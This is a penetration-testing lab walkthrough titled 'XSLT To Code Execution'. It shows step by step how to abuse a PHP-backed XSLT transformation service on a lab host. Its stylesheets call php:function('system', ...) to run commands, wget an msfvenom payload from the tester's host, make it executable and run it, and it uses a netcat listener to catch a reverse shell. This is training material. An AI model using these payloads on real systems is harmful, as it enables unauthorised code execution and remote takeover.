LM10b XSLT To Code Execution
LM10b XSLT To Code Execution
LM10b XSLT To Code Execution
You are performing a penetration test against a web application (172.16.64.191) with a clear
functionality: Transform data. Figure out its logic and try to abuse it.
• Browser
• Text editor
• Netcat
• Nmap
• Metasploit
• HTTP Server
Take a look at the application. Perform reconnaissance activities and figure out if an XSLT engine is
employed by the application.
Try submitting/uploading various malicious files to the underlying XSLT engine to identify if the
underlying parser is insecure. Executing code will prove that the underlying parser is insecure.
Hint: Try searching online for “calling php functions in xsl 1.0”.
If you navigate to 172.16.64.191, you will come across a “transformation service”. Such services usually
employ XSLT. You can upload two files and then choose “transform”. If you do that, you will be
transferred to another page.
Let’s make sure that an XSLT engine is under the hood. To do that we will use the two files below.
sample.xml
<?xml version="1.0"?>
<root>something</root>
detect.xsl
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
After uploading the above files and clicking “transform” you should get a confirmation that an XSLT
engine is present.
As we already have a dummy XML file, we can focus just on modifying the XSL stylesheet. In this case,
you need to look for online documentation of XSL parsers. Already knowing the version, you should look
for “calling php functions in xsl 1.0” or something similar, which might end up in finding websites similar
to the one below.
http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls
Using code from the above website, let’s construct another XSL file that should execute some code.
exec.xsl:
<!--
- Simple test to call php function
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- We add the PHP's xmlns -->
<xsl:template match="/">
<html>
<!-- We use the php suffix to call the function ucwords() -->
<xsl:value-of select="php:function('system','uname -a')" />
<!-- Output: 'Php Can Now Be Used In Xsl' -->
</html>
</xsl:template>
</xsl:stylesheet>
Transforming the dummy xml used previously with the above xsl results in code execution.
As code execution is confirmed, we need to turn it into a fully functional reverse shell. There are
multiple ways to do it, we will show just one but of course any method that leads to reverse shell is
acceptable.
First, as we know the system architecture we can generate a Metasploit payload using msfvenom
(Metasploit payload generator tool). We will also use Python’s SimpleHTTPServer to host it.
The next step will be to prepare a xsl stylesheet that will make the victim system download that file. Of
course, you need to check your tap0 IP address in order to download the reverse shell from the proper
location. In our case, the IP address was 172.16.64.3
exec.xsl (updated):
<!--
- Simple test to call php function
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- We add the PHP's xmlns -->
<xsl:template match="/">
<html>
<!-- We use the php suffix to call the function ucwords() -->
<xsl:value-of select="php:function('system','wget
http://172.16.64.3:443/53 -O /tmp/53')" />
<!-- Output: 'Php Can Now Be Used In Xsl' -->
</html>
</xsl:template>
</xsl:stylesheet>
After uploading this file and running the transformation, we can observe a connection in our Python
HTTP Server.
This means that the target system successfully downloaded the content. Now we can try to execute the
reverse shell. In order to do that, we first need to give it executable permissions and then just launch it.
In the meantime, don’t forget to set up a netcat listener on the same port where the reverse shell will
connect to.
nc -lvp 53
Let’s create the following stylesheet to make our payload executable & execute the reverse shell.
<!--
- Simple test to call php function
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- We add the PHP's xmlns -->
<xsl:template match="/">
<html>
<!-- We use the php suffix to call the function ucwords() -->
<xsl:value-of select="php:function('system','chmod +x /tmp/53')" />
<xsl:value-of select="php:function('system','/tmp/53')" />
By uploading and transforming the dummy xml with the above stylesheet, we should be able to obtain a
reverse shell.
10